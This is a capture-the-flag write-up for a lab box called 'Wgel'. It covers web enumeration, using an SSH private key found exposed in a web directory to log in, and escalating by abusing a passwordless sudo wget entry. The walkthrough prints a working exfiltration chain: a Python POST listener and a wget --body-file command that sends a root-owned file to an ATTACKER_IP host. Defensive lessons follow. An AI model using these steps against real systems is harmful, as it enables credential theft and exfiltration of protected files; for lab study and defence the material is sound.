Wgel
Enumerate a deceptive default web page to uncover an exposed SSH
private key, establish user access, then abuse a privileged
wget binary to exfiltrate root-owned files over HTTP.
Objective #
Compromise the target host by identifying the initial access path through web enumeration, establish a stable user shell via an exposed SSH private key, enumerate local privilege boundaries, and escalate privileges to recover both the user and root flags using a reproducible, technically grounded workflow.
A two-service footprint (SSH + HTTP) typically means the web server
will yield credentials, keys, or hidden content that unlocks SSH.
The privilege escalation hinges on recognizing that
sudo wget is not a benign download allowance —
it is a root-context file-read-and-transmit primitive.
Learning Objectives #
- Perform disciplined initial reconnaissance against a minimal service surface.
- Distinguish between default placeholder content and operationally meaningful hidden content.
- Use directory enumeration to reveal non-linked web assets behind a stock landing page.
- Recognize the severity of exposed private keys in web-accessible directories.
- Validate and operationalize SSH key-based authentication from recovered material.
- Interpret
sudo -loutput as an attack surface map rather than a permissions list. - Abuse
wgetas a privileged read-and-exfiltration primitive through HTTP POST body injection. - Pivot cleanly when initial privilege escalation assumptions fail.
Skills Tested #
Attack Flow #
Target Identification
|
v
Nmap Service Recon
[SSH 22 + HTTP 80]
|
v
HTTP Inspection
[Default page + "Jessie" comment]
|
v
Directory Enumeration
[Discover /sitemap/]
|
v
Recursive Enumeration
[Expose /sitemap/.ssh/]
|
v
Recover id_rsa
[Download + validate key]
|
v
SSH as jessie
[Key-based authentication]
|
v
User flag + sudo -l
[NOPASSWD: /usr/bin/wget]
|
v
wget POST body-file exfil
[Root file -> attacker listener]
|
v
Capture /root/root_flag.txt
Methodology #
1 · Establish the External Attack Surface
The Action
Start with an Nmap scan using default scripts and service version detection to map the exposed service surface.
nmap -Pn -sC -sV 10.65.160.47
The Reasoning
This is the correct first move against an unknown host because it
provides three things simultaneously: port exposure, service
fingerprints, and common script-level metadata that often reveals
weak configuration. Using -Pn avoids host discovery
issues common in VPN-style lab environments. The -sC -sV
combination is appropriate on easy boxes because the service surface
is typically small and the additional context sharply reduces blind
trial-and-error.
The Findings
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Only two services are exposed. A two-service footprint usually means the intended path is not broad exploitation but focused enumeration of one service to gain access to the other. SSH looks like a post-discovery service rather than the initial entry point.
Thought Process
The working hypothesis at this point: the web server will yield credentials, keys, usernames, or hidden content that then unlocks SSH. Because SSH is exposed but unauthenticated, it is more likely the destination than the starting point.
2 · Validate the HTTP Surface and Inspect for Human Clues
The Action
curl -i http://10.65.160.47/
curl -i http://10.65.160.47/robots.txt
The Reasoning
Before running brute-force directory discovery, validate the application behavior directly. This establishes a baseline response, confirms whether the root is a real application or placeholder, and sometimes exposes comments or linked paths that influence later enumeration.
The Findings
The root returned the standard Apache Ubuntu default page.
robots.txt returned 404 Not Found. However,
inside the HTML there was a notable comment:
<!-- Jessie don't forget to udate the webiste -->
This comment reveals three things: the default page is not the whole story, a human named Jessie likely maintains content on this host, and a future SSH username candidate has just appeared. Comments in default pages often look trivial, but they can reveal operator names, staging notes, deployment mistakes, or hidden content paths.
Thought Process
The hypothesis evolved from “this is just a default web page” to “this host probably has unlinked content that the operator failed to expose cleanly.” That justified moving into directory enumeration.
3 · Enumerate Hidden Web Content
The Action
gobuster dir -u http://10.65.160.47/ \
-w /usr/share/dirb/wordlists/common.txt \
-x php,txt,html \
-b 403,404 \
-t 20 -q
The Reasoning
The site root looked intentionally misleading. Directory brute-forcing is the correct follow-up because HTTP servers commonly host unlinked resources, alternate site roots, staging directories, backups, or administrative content not referenced from the landing page. The tuned flags matter:
-b 403,404— reduces noise from forbidden and missing responses-x php,txt,html— widens coverage for common file-backed assets-q— reduces verbosity so high-value hits are more visible
The Findings
/sitemap (Status: 301) [--> http://10.65.160.47/sitemap/]
/sitemap/ was not a search-engine sitemap artifact; it
was a hidden content directory hosting an entirely different site
tree. This was the first real pivot point.
Thought Process
Treat /sitemap/ as the true application root and repeat
content discovery there. The naming itself suggested a manually
published directory rather than a hardened application path.
4 · Enumerate the Hidden Site Tree
The Action
curl -i http://10.65.160.47/sitemap/
gobuster dir -u http://10.65.160.47/sitemap/ \
-w /usr/share/dirb/wordlists/common.txt \
-x php,txt,html \
-b 403,404 \
-t 20 -q
The Reasoning
Whenever a second web root appears, it should be treated as a fresh target. Even if it is static content, the structure may expose sensitive directories, weak permissions, or artifacts left by deployment tooling.
The Findings
The second enumeration exposed multiple application assets and one critically suspicious result:
/.ssh (Status: 301) [--> http://10.65.160.47/sitemap/.ssh/]
A .ssh directory should never be
web-accessible. This is a severe operational mistake that likely
exposes authentication material directly to any HTTP client.
Thought Process
The attack hypothesis became very strong: if the .ssh
directory is indexed or misserved, there is a realistic chance of
credential material being publicly exposed.
5 · Recover the Exposed SSH Private Key
The Action
curl -i http://10.65.160.47/sitemap/.ssh/
curl http://10.65.160.47/sitemap/.ssh/id_rsa -o id_rsa
chmod 600 id_rsa
ssh-keygen -y -f id_rsa
The Reasoning
Directory listing confirms not just that a path exists, but exactly
what assets are inside it. Once id_rsa is visible, key
recovery becomes the obvious path. Validating the key with
ssh-keygen -y is a best practice because it proves the
file is structurally sound before using it operationally.
The Findings
Index of /sitemap/.ssh
id_rsa
The private key was retrievable directly over HTTP.
Exposed private keys are not “sensitive files” in the generic sense; they are authentication objects. Their exposure often converts directly into shell access without any further exploitation required.
Thought Process
The remaining question was not whether the key mattered, but which
user it matched. The earlier Jessie comment made
jessie the leading candidate.
6 · Establish SSH Access
The Action
ssh -i id_rsa jessie@10.65.160.47
On first connection, review the SSH host key fingerprint when prompted and accept it only if it matches the expected server.
Then run immediate enumeration:
id
hostname
pwd
ls -la ~
sudo -l
The Reasoning
Once a probable username is available, SSH is the highest-value next step because it moves the attack from remote content discovery into authenticated local enumeration, drastically increasing visibility and shortening the path to both flags.
The Findings
Authentication succeeded as jessie. The host was
CorpOne, and the account belonged to multiple standard
local groups including sudo. The most important output:
User jessie may run the following commands on CorpOne:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/wget
The sudo -l output is more important than any
filesystem loot at this stage. It provides a root-execution-capable
utility without a password prompt — effectively announcing
the privilege escalation vector.
Thought Process
Two immediate goals remained:
- Find the user flag.
- Determine how to convert privileged
wgetinto controlled root file access.
7 · Recover the User Flag
The Action
find /home /var/www -maxdepth 3 \( -name user.txt -o -name '*.txt' \) 2>/dev/null | sort
cat /home/jessie/Documents/user_flag.txt
The Reasoning
In CTF-style Linux targets, user flags are usually stored under the home directory but not always under a conventional filename. Searching a bounded path depth avoids unnecessary system noise while still covering likely locations.
The Findings
The user flag was stored at /home/jessie/Documents/user_flag.txt.
8 · Attempt Direct Root File Read via wget
The Action
sudo /usr/bin/wget -O- file:///root/root.txt
The Reasoning
This is the fastest hypothesis test. If the binary can interpret
file:// URLs under root context, the privilege
escalation collapses into a one-liner. Always test the simplest path
first.
The Findings
file:///root/root.txt: Unsupported scheme 'file'.
The command failed. This meant wget would not provide a
direct local-file retrieval path through that syntax.
Seeing a powerful network tool under sudo and assuming
the simplest local URL handler will work. Capabilities differ
across versions and utilities. The failure does not invalidate the
exploitability of wget — it only invalidates one
specific interface.
Thought Process
The next question: how else can wget be made to touch a
root-owned file and transmit its contents? The answer lies in
wget’s ability to read local files as HTTP request
bodies.
9 · Convert wget into a Root File Exfiltration Primitive
The Action
Stand up a local HTTP listener that records POST bodies, then instruct
target-side wget to issue an HTTP POST whose body is
read from a root-owned file.
Attacker-side listener:
from http.server import BaseHTTPRequestHandler, HTTPServer
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
length = int(self.headers.get("Content-Length", "0"))
body = self.rfile.read(length)
with open("post_body.bin", "wb") as f:
f.write(body)
self.send_response(200)
self.end_headers()
self.wfile.write(b"ok\n")
def log_message(self, format, *args):
return
HTTPServer(("0.0.0.0", 8000), Handler).serve_forever()
Start the listener:
python3 post_server.py
Target-side exfiltration:
sudo /usr/bin/wget --method=POST \
--body-file=/root/root_flag.txt \
http://<ATTACKER_IP>:8000/ -O-
The Reasoning
This is the critical exploit step. When wget runs under
sudo, it executes as root. The --body-file
option instructs it to open a local file and use the file contents as
the HTTP request body. This creates a three-stage privilege abuse
chain:
| Stage | Behavior | Result |
|---|---|---|
sudo elevation |
wget runs with UID 0 |
Root permissions apply to all file operations |
--body-file=/root/root_flag.txt |
wget opens a root-owned file locally |
Protected content becomes readable by the process |
http://attacker:8000/ |
wget sends an outbound POST request |
File content leaves the host to the attacker listener |
This is not shell escape in the classic sense. It is
capability abuse: a privileged network client is
repurposed into a controlled file exfiltration mechanism.
wget bridges two trust boundaries simultaneously
— privileged local file system access and remote network
transmission — which is exactly why it should never be
granted unrestricted NOPASSWD execution.
The Findings
The first path guess /root/root.txt failed because the
file did not exist. The adjusted path
/root/root_flag.txt succeeded, and the listener captured
the flag body.
Rabbit Holes & Pivots #
Not every path leads forward. Documenting failures is as important as documenting successes — each dead end refined the attack model.
1. Wrong Wordlist Location on Ubuntu
Initially assumed a Kali-like path (/usr/share/wordlists/...)
that did not exist on this Ubuntu-based environment. The path did not
exist and gobuster returned a file error immediately.
Pivot: inspected available shared directories,
identified /usr/share/dirb/wordlists/common.txt, and
resumed enumeration successfully.
2. Noisy Directory Enumeration
An early gobuster run timed out and produced low-value
noise, dominated by repetitive 403-style responses rather than
meaningful application paths.
Pivot: suppressed 403 and
404 output with -b 403,404, reran the scan,
and surfaced the important /sitemap/ hit more clearly.
3. Malformed Local Copy of the Private Key
A manually reconstructed copy of the key caused an SSH-side
libcrypto parsing error. OpenSSH failed before
authentication with a format error rather than an access-control error.
Pivot: redownloaded the key directly from the target
with curl, verified it with ssh-keygen -y,
and retried authentication successfully.
4. Unsupported file:// Scheme in wget
The attempt to read /root/root.txt via
file:// failed because the installed wget
did not support that scheme for this abuse path.
Pivot: reframed wget as a transport
tool rather than a local URL reader, and used
--body-file with an outbound POST instead.
5. Wrong Root Flag Filename
The first exfiltration attempt used /root/root.txt and
failed because the file was named differently on this host.
Pivot: adjusted to
/root/root_flag.txt and captured the correct file
successfully.
Deep Dives #
Why Web Enumeration Still Matters on a “Default Page” Target
The site initially presented a generic Apache landing page — exactly the sort of condition that causes inexperienced operators to under-enumerate. In reality, default pages often coexist with hidden directories, alternate content roots, staging material, or forgotten deployments.
The key lesson is that HTTP response content and server role are not the same thing. A default page only proves what is mapped to the current visible route, not what exists elsewhere in the document tree.
| Observation | Technical Meaning | Operational Implication |
|---|---|---|
| Apache default page | The visible root is a stock placeholder | Hidden content may exist in sibling paths |
| Human comment mentioning Jessie | A real operator touched the page | Unpublished or weakly published content likely exists |
301 redirect to /sitemap/ |
Alternate content root exists | Enumerate recursively from the new root |
.ssh/ web path exposed |
File permissions or publication boundaries are broken | Credential material may be directly recoverable |
Enumeration is not about “running tools” — it is about disproving assumptions. The assumption that “default page means nothing here” was wrong, and disciplined enumeration exposed the real attack path.
Why sudo wget Is a Privileged File Exfiltration Primitive
Many defenders understand why sudo vim,
sudo less, or sudo tar can be dangerous.
Fewer immediately recognize why sudo wget is also
dangerous. The issue is not just downloading — it is
capability composition.
| Capability | Security Relevance |
|---|---|
| Can open local files for request bodies | Reads local data in the security context it runs under |
| Can send HTTP requests outbound | Transmits attacker-selected data to attacker-selected destinations |
Can be run as root via sudo |
Converts file access from user scope to root scope |
| Does not require an interactive shell | Provides meaningful privilege abuse without classic shell escape |
This is a classic example of a boundary-crossing utility: boundary 1 is privileged local file system access, boundary 2 is remote network transmission. When a single tool spans both boundaries under root authority, sensitive data can be exfiltrated even without a root shell.
Least privilege must be evaluated by capabilities,
not by how “harmless” a tool sounds. A downloader that
can read local files and talk to the network is not harmless under
sudo.
Defensive Lessons #
1. Never Expose .ssh Material Through the Web Server
- Keep user home directories and web roots strictly segregated.
- Disable directory indexing unless explicitly required.
- Add web server deny rules for hidden files and sensitive path patterns such as
.ssh,.git, and backup files. - Run periodic content audits to identify credential material under document roots.
2. Treat Private Key Exposure as Immediate Credential Compromise
- Rotate exposed keys immediately.
- Review
authorized_keys, SSH logs, and network access records. - Enforce passphrase-protected keys where possible.
- Prefer separate deployment credentials over personal user credentials.
3. Harden sudoers by Capability, Not Name
- Do not allow general-purpose network tools such as
wgetorcurlwith unrestrictedNOPASSWDexecution. - If automation requires downloads, constrain the command path, arguments, destination, and user context tightly.
- Use wrapper scripts with fixed behavior instead of raw binary allowances.
4. Detect Outbound Abuse Patterns
- Monitor unusual outbound HTTP requests from internal hosts.
- Alert on privileged processes initiating network connections unexpectedly.
- Correlate
sudoevents with outbound traffic for high-confidence detections.
5. Reduce Information Leakage in Web Content
- Remove developer comments from production HTML.
- Review static content for names, environment references, or deployment hints.
- Use automated secret scanning in CI/CD pipelines for web-published artifacts.
Assuming a default page means nothing is hosted · skipping
recursive enumeration on discovered subdirectories ·
failing to validate recovered key integrity before use ·
treating wget as a harmless download tool under
sudo · not monitoring for privileged outbound
network activity.
Full Reproduction Path #
The following is the clean, successful path without exploratory mistakes.
-
Service reconnaissance
nmap -Pn -sC -sV 10.65.160.47— identify SSH on 22 and HTTP on 80. -
HTTP inspection
Retrieve the web root withcurl. Note theJessiecomment in page source. -
Root directory enumeration
Rungobusteragainst/. Discover/sitemap/. -
Recursive enumeration
Rungobusteragainst/sitemap/. Discover/.ssh/. -
Key recovery
Downloadid_rsafrom/sitemap/.ssh/. Validate withssh-keygen -y. -
SSH authentication
ssh -i id_rsa jessie@10.65.160.47— access confirmed. -
User flag recovery
cat /home/jessie/Documents/user_flag.txt -
Privilege enumeration
sudo -l— revealsNOPASSWD: /usr/bin/wget. -
Root flag exfiltration
Start attacker-side listener, then runsudo wget --method=POST --body-file=/root/root_flag.txt http://ATTACKER:8000/ -O- -
Capture root flag
Readpost_body.binon the attacker machine.
Commands Reference #
Reconnaissance
nmap -Pn -sC -sV 10.65.160.47
curl -i http://10.65.160.47/
Directory Enumeration
gobuster dir -u http://10.65.160.47/ \
-w /usr/share/dirb/wordlists/common.txt \
-x php,txt,html \
-b 403,404 -t 20 -q
gobuster dir -u http://10.65.160.47/sitemap/ \
-w /usr/share/dirb/wordlists/common.txt \
-x php,txt,html \
-b 403,404 -t 20 -q
Credential Recovery & Initial Access
curl http://10.65.160.47/sitemap/.ssh/id_rsa -o id_rsa
chmod 600 id_rsa
ssh-keygen -y -f id_rsa
ssh -i id_rsa jessie@10.65.160.47
User Enumeration & Flag
find /home /var/www -maxdepth 3 \( -name user.txt -o -name '*.txt' \) 2>/dev/null | sort
cat /home/jessie/Documents/user_flag.txt
sudo -l
Privilege Escalation via wget
Attacker-side listener (post_server.py):
from http.server import BaseHTTPRequestHandler, HTTPServer
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
length = int(self.headers.get("Content-Length", "0"))
body = self.rfile.read(length)
with open("post_body.bin", "wb") as f:
f.write(body)
self.send_response(200)
self.end_headers()
self.wfile.write(b"ok\n")
def log_message(self, format, *args):
return
HTTPServer(("0.0.0.0", 8000), Handler).serve_forever()
Start it:
python3 post_server.py
Target-side exfiltration:
sudo /usr/bin/wget --method=POST \
--body-file=/root/root_flag.txt \
http://<YOUR_TUN0_IP>:8000/ -O-
Read the captured body:
python3 -c "from pathlib import Path; print(Path('post_body.bin').read_bytes().decode())"
Flags #
The room is easy by design, but the lessons are real: a single
exposed private key can invalidate an otherwise small attack
surface, and a single careless sudoers entry can
convert limited user access into root data exposure without ever
requiring a full interactive root shell.